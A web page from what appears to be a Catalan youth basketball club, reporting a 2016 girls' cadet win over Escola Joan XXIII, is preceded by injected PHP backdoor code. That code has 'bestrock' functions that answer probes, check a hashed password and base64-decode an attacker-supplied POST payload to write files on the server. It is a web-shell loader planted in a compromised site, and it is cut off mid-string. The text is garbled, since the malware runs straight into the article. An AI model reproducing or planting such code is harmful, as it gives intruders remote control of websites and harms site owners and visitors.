function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 1 juga amb molt d'ordre i venç el Joan XXIII (28-43) - Tgn Bàsquet Club -

El cadet femení 1 juga amb molt d’ordre i venç el Joan XXIII (28-43)

Updated: maig 4, 2016

El cadet femení 1 del TGN Bàsquet va vèncer l’Escola Joan XXIII a domicili en un partit que es va començar a decantar per les visitants en el segon període.

El matx va estar marcat per les condicions climatològiques. Jugant a l’aire lliure, el vent va dificultar molt el joc dels dos equips. Amb tot, les locals van sortir millors i les visitants tenien problemes per atacar la zona molt tancada del seu rival.

El panorama va canviar en el segon quart. Des de la defensa i tancant molt bé el rebot defensiu, el TGN Bàsquet es va fer l’amo del matx i va marcar un parcial de 0-12 que, al descans li atorgava un avantatge de 4 punts (13-17).

Les locals van voler reaccionar en el tercer quart però l’ordre en atac de les liles va ser cabdal per marcar un altre bon parcial de 5-15 i jugar els últims 10 minuts amb un marcador favorable de 18-32.

Tot i els esforços de l’Escola Joan XXIII, el TGN Bàsquet va saber administrar l’avantatge i vèncer el partit.